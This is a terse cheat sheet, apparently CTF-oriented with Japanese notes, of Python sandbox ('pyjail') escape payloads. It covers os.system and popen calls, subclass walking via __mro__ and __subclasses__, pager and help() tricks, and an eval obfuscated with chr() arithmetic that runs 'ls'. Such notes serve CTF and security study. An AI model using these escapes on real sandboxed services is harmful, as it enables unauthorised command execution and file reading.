setattr(license, '_Printer__filenames', ['flag']);license()open('flag','r').read()
__import__('os').system('ls')help()os.environ["PAGER"]が"less"の場合のみ、less上で!lsなどを実行
help()- 任意のファイルをアップロードできるの場合のみ、help上でモジュール名を入力すると、そのモジュールが実行される
- https://github.com/satoki/ctf4b_2022_satoki_writeups/tree/master/misc/hitchhike4b#%E8%A7%A3%E6%B3%95
__builtins__.__import__('os').popen('ls').read()().__class__.__mro__[1].__subclasses__()[-1]('ls')- 環境によって
().__class__.__mro__[1]の値が変わるので、-1は適宜変える
- 環境によって
''.__class__.__base__.__subclasses__()[-1]('ls')- 環境によって
-1を適宜変える
- 環境によって
eval('chr(11+11+11+11+11+11+11+11+1+1+1+1+1+1+1)+chr(11+11+11+11+11+11+11+11+1+1+1+1+1+1+1)+chr(11+11+11+11+11+11+11+11+11+1+1+1+1+1+1)+chr(11+11+11+11+11+11+11+11+11+1+1+1+1+1+1+1+1+1+1)+chr(111+1)+chr(111)+chr(111+1+1+1)+chr(111+1+1+1+1+1)+chr(11+11+11+11+11+11+11+11+1+1+1+1+1+1+1)+chr(11+11+11+11+11+11+11+11+1+1+1+1+1+1+1)+chr(11+11+11+1+1+1+1+1+1+1)+chr(11+11+11+1)+chr(111)+chr(111+1+1+1+1)+chr(11+11+11+1)+chr(11+11+11+1+1+1+1+1+1+1+1)+chr(11+11+11+11+1+1)+chr(111+1+1+1+1)+chr(111+1+1+1+1+1+1+1+1+1+1)+chr(111+1+1+1+1)+chr(111+1+1+1+1+1)+chr(11+11+11+11+11+11+11+11+11+1+1)+chr(11+11+11+11+11+11+11+11+11+1+1+1+1+1+1+1+1+1+1)+chr(11+11+11+1+1+1+1+1+1+1)+chr(11+11+11+1)+chr(11+11+11+11+11+11+11+11+11+1+1+1+1+1+1+1+1+1)+chr(111+1+1+1+1)+chr(11+11+11+1)+chr(11+11+11+1+1+1+1+1+1+1+1)')